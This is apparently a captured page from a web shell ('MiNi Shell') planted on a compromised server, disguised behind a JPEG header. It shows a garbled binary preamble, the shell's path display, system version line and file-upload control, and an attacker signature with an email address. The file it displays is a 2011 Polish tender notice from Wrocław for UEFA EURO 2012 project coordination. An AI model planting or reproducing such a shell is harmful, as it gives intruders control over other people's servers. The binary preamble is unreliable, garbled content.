JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110203/40425-N-2011.html

<p class="kh_header"><b>Wrocław: Koordynacja, monitoring i doradztwo w zakresie prowadzenia inwestycji związanych z organizacją UEFA EURO 2012TM</b><br>
<b>Numer ogłoszenia: 40425 - 2011; data zamieszczenia: 03.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wrocław Urząd Miejski Wrocławia , pl. Nowy Targ 1/8, 50-141 Wrocław, woj. dolnośląskie, tel. 071 7779230, 7779231, faks 071 7779229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.um.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Koordynacja, monitoring i doradztwo w zakresie prowadzenia inwestycji związanych z organizacją UEFA EURO 2012TM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest koordynacja działań podejmowanych przez Zamawiających, prowadzenie monitoringu oraz doradztwa dla przedstawicieli Zamawiających, a także dla osób wskazanych przez Zamawiających, które uczestniczą 
w różnych etapach realizacji Projektu. 

Cel ogólny zamówienia to wsparcie przedstawicieli Zamawiających przy realizacji projektu pn. Budowa Stadionu Miejskiego we Wrocławiu oraz wskazanych inwestycji związanych 
z organizacją Turnieju UEFA EURO 2012. Ze względu na obszerny zakres Projektu, jego zakres rzeczowy i specyfikę poszczególnych elementów niezbędne jest wsparcie ze strony doświadczonych ekspertów zewnętrznych. Prowadzony będzie bieżący monitoring realizacji Projektu, jak również opracowywane odpowiednie rozwiązania w sytuacjach, 
w których zagrożony jest zarówno proces realizacji inwestycji cząstkowych, jak również proces realizacji Projektu. Interdyscyplinarny charakter Projektu wynikający z zakresu poszczególnych projektów i konieczności współpracy z wieloma wykonawcami, a także wynikające z tego kolizje projektowe muszą być na bieżąco monitorowane 
i rozwiązywane. Zespół Projektowy odpowiedzialny będzie za monitorowanie przebiegu realizacji poszczególnych projektów oraz czasu pozostałego do ukończenia Projektu. Celem tych działań jest uniknięcie kolizji pomiędzy poszczególnymi zadaniami 
w Projekcie, jak również skoordynowania wzajemnego oddziaływanie działań będących elementami składowymi innych projektów. Projekt pn. Budowa Stadionu Miejskiego we Wrocławiu jest kluczowym elementem dla organizacji we Wrocławiu Mistrzostw Europy 
w piłce nożnej UEFA EURO 2012.
Skład Zespołu Projektowego wykonującego zamówienie to Kierownik Zespołu oraz przynajmniej 2 Członków Zespołu. Zakłada się cotygodniową obecność we Wrocławiu minimum jednego Członka Zespołu Wykonawcy. Kierownik Projektu będzie pracował 
w siedzibie Zamawiających minimum przez dwa dni co dwa tygodnie. Członkowie Zespołu będą pracowali w siedzibie Zamawiających minimum dwa dni cotygodniowo. Zamówienie dotyczyć będzie wsparcia w zakresie koordynacji prac, monitoringu i doradztwa dla zespołu odpowiedzialnego za realizację projektu pn. Budowa stadionu miejskiego we Wrocławiu oraz wybranych inwestycji związanych z organizacją UEFA EURO 2012 zgodnie z wykazem stanowiącym Załącznik nr 6.1.1 do SIWZ (będącym jednocześnie Załącznikiem nr 1.1 do umowy). Wsparcie ma doprowadzić do sprawnego i skutecznego zarządzania poszczególnymi procesami, a przede wszystkim terminową i zgodną z harmonogramem realizację poszczególnych zadań w projekcie. Monitoring dokonywany będzie w oparciu o śledzenie bufora pozostałego do końca realizacji projektu oraz opracowaniu Harmonogramu. Zespół wyznaczy łańcuchy krytyczne projektów, czyli najdłuższe ciągi zadań wzajemnie ze sobą powiązanych warunkujące czas realizacji projektu przy optymalnie zbilansowanych zasobach przy wykorzystaniu specjalistycznego narzędzia pozwalającego kontrolować postępy poszczególnych zadań w projekcie. Zadania znajdujące się w łańcuchu krytycznym będą podlegały ciągłej kontroli. Ten sam sposób monitoringu dokonywany będzie również na projektach realizowanych wokoło projektowanego stadionu w celu uniknięcia kolizji oraz doprowadzenia do terminowego ukończenia poszczególnych projektów do czasu organizacji Turnieju Finałowego Mistrzostw Europy w Piłce Nożnej UEFA EURO 2012. Łańcuch krytyczny, który uwzględnia analizę ryzyka i niepewność poprzez zastosowanie buforów czasu, umożliwić ma dotrzymanie ustalonych z góry terminów i przebiegu ścieżki krytycznej.
Doradztwo polegać będzie na szczegółowym omawianiu występujących w poszczególnych projektach problemów i kolizji, a następnie doprowadzeniu do natychmiastowej reakcji 
w celu ich wykluczenia. Doradztwo obejmować będzie również tworzenie planów awaryjnych dla problemów zdiagnozowanych, jak również dla problemów niezdiagnozowanych, które mogą pojawić się w trakcie realizacji zadań.

Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 6.1 do SIWZ będący jednocześnie Załącznikiem nr 1 do umowy. Pozostałe warunki realizacji zamówienia zawarte są w Projekcie umowy.

Wykonawca jest zobowiązany do wskazania w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom (art. 36 ust. 4 ustawy Pzp)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.22.40.00-1, 72.24.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał 
z należytą starannością co najmniej dwa zamówienia o podobnym przedmiocie (koordynacja, monitoring i doradztwo) w oparciu o metodę łańcucha krytycznego, w tym co najmniej jedno zamówienie dla instytucji publicznej, ukończone.

UWAGA: przez instytucje publiczne należy rozumieć instytucje świadczące usługi 
o charakterze publicznym w tym również instytucje w rozumieniu art. 3 ustawy Pzp, które do udzielania zamówień publicznych stosują ustawę Prawo Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje zespołem min. 3 osób, o odpowiednim doświadczeniu i kwalifikacjach tj.:

Kierownikiem zespołu spełniającym poniższe wymagania (łącznie):
1.	wykształcenie wyższe, 
2.	znajomość języka polskiego w stopniu komunikatywnym,
3.	znajomość języka angielskiego w stopniu komunikatywnym,
4.	pełna znajomość metodologii łańcucha krytycznego, potwierdzona przez międzynarodową organizację certyfikacyjną teorii ograniczeń (TOCICO - Theory 
of Constrain International Certification Orgnization),
5.	10-letnie doświadczenie w dziedzinie wdrażania metodologii łańcucha krytycznego, 
6.	udane (wdrożone i stosowane) zastosowanie metodologii łańcucha krytycznego 
w przynajmniej dwóch przedsięwzięciach wielo-projektowych, 

Zespołem 
(co najmniej 2 osoby) spełniającym, poniższe wymagania (łącznie):
1.	wykształcenie wyższe,
2.	znajomość języka polskiego w stopniu komunikatywnym,
3.	znajomość języka angielskiego w stopniu komunikatywnym,
4.	pełna znajomość metodologii łańcucha krytycznego, potwierdzona przez międzynarodową organizację certyfikacyjną teorii ograniczeń (TOCICO - Theory 
of Constrain International Certification Organization),
5.	doświadczenie w realizacji projektów metodą łańcucha krytycznego (CCPM), 
z wykorzystaniem narzędzi informatycznych,
w tym (co najmniej jedna osoba), spełniająca poniższe wymagania:
6.	wykształcenie wyższe techniczne oraz doświadczenie w realizacji projektów budowlanych, w tym minimum jeden w warunkach polskiego systemu prawnego,
7.	minimum jedno udane (wdrożone i stosowane) zastosowanie, metodologii łańcucha krytycznego w polskiej lub europejskiej instytucji publicznej, 
(ze względu na odmienne procedury prawne działalności w instytucjach publicznych).
8.	skuteczne (wdrożone i stosowane) zastosowanie metodologii łańcucha krytycznego w przynajmniej jednym przedsięwzięciu wielo-projektowym w Polsce.

UWAGA: przedsięwzięcie wielo-projektowe to takie, w którym jednocześnie wykonywane są co najmniej 3 odrębne projekty wzajemnie ze sobą powiązane.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. w przypadku polegania na wiedzy i doświadczeniu innego podmiotu 
- w szczególności pisemne zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów z zakresu wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia (w formie oryginału). 
2. w przypadku polegania na osobach zdolnych do wykonania zamówienia innego podmiotu - w szczególności pisemne zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów osobowych na okres korzystania z nich przy wykonywaniu zamówienia (w formie oryginału)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający informuje, iż przewiduje możliwość zmiany postanowień zawartej umowy 
w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, 
w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, 
z uwzględnieniem podawanych warunków ich wprowadzenia:
a)	zmian ogólnie obowiązujących przepisów, prawa miejscowego oraz wymogów dotyczących Zamawiającego; bezpośrednio odnoszących się do praw 
i obowiązków stron umowy. Zmiany umowy dokonane mogą być tylko w zakresie niezbędnym do dostosowania zapisów umowy do wprowadzonych przepisów,
b)	zmiany w zakresie terminów realizacji Projektu lub warunków jego realizacji niezależnych od stron umowy. Zmiana terminu określonego w umowie, jest możliwa tylko w zakresie niezbędnym do dostosowania umowy do zmienionych warunków,
c)	w przypadku wystąpienia nieprzewidzianych w momencie ogłoszenia utrudnień w realizacji wymienionych zadań inwestycyjnych, opóźnień w realizacji zadań określonych Wykazem stanowiącym Załącznik nr 6.1.1 do SIWZ, 
w szczególności wynikających m.in. ze zmiany przepisów, sił natury, błędów ludzkich bądź konieczności włączenia dodatkowych zadań inwestycyjnych niezbędnych do realizacji przedmiotu zamówienia,
d)	zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy 
- dopuszcza się zmianę  osób  przedstawionych w ofercie jedynie 
w uzasadnionych przez Wykonawcę przypadkach oraz za uprzednią pisemną zgodą Zamawiającego. Zamawiający nie może odmówić takiej zgody jeśli nowe osoby będą spełniały warunki określone przez zamawiającego,
e)	jeśli w ramach wykazania spełniania warunku wiedzy i doświadczenia Wykonawca korzysta z zasobów podmiotu trzeciego, który będzie brał udział w realizacji części zamówienia jako podwykonawca - Zamawiający dopuszcza możliwość zmiany podwykonawcy jeśli wykaże on, że posiada co najmniej takie doświadczenie jakie wymagane było dla spełnienia warunku wiedzy 
i doświadczenia określonych przez zamawiającego, 
f)	w innych sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy i mających charakter zmian nieistotnych tj. nie odnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielania zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona,
g)	gdy zmiany są korzystne dla Zamawiającego, 
h)	ze względu na zaistnienie siły wyższej. Zmiana umowy dopuszczalna jest tylko 
w takim zakresie, aby po ustaniu działania siły wyższej, wykonawca mógł wykonać przedmiot zamówienia w sposób zgodny z SIWZ. Pod pojęciem siły wyższej rozumie się wszystkie zdarzenia zewnętrzne niemożliwe do przewidzenia i niemożliwe do zapobieżenia przez strony(ę) umowy, a zaistniałe po podpisaniu umowy, w szczególności takie jak:
-	wojny, działania wojenne, inwazje, działania wrogów zagranicznych,
-	terroryzm, rewolucje, powstania, wojny domowe,
-	rozruchy z wyjątkiem tych, które są ograniczone wyłącznie do pracowników Wykonawcy lub jego podwykonawców, lub Zamawiającego,
-	zanieczyszczenie i inne podobnie niebezpieczne skutki spowodowane przez substancje toksyczne, z wyjątkiem tych, które mogą być przypisane użyciu przez Wykonawcę takich substancji,
-	działania sił przyrody, huragany, powodzie,
-	ogólnokrajowe bądź regionalne spory w przemyśle lub też spory, które są częścią ogólnonarodowej lub regionalnej kampanii, a którym Strona nie mogła zapobiec.

Przewidziane powyżej okoliczności stanowiące podstawę zmian do umowy, stanowią uprawnienie Zamawiającego nie zaś jego obowiązek wprowadzenia takich zmian. 
2. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Pzp: zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy, zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami.
Wszelkie zmiany i uzupełnienia umowy wymagają formy pisemnej pod rygorem nieważności za zgodą obu stron.
3. Wszelkie zmiany muszą być dokonywane z zachowaniem przepisu art. 140 ust. 1 ustawy Pzp i art.140 ust. 3 stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawartego w Specyfikacji  Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Wrocławia - Wydział Zamówień Publicznych
Al. Kromera 44, 51-163 Wrocław
pokój nr 138.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2011 godzina 10:00, miejsce: Urząd Miejski Wrocławia - Wydział Zamówień Publicznych
Al. Kromera 44, 51-163 Wrocław
pokój nr 138.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com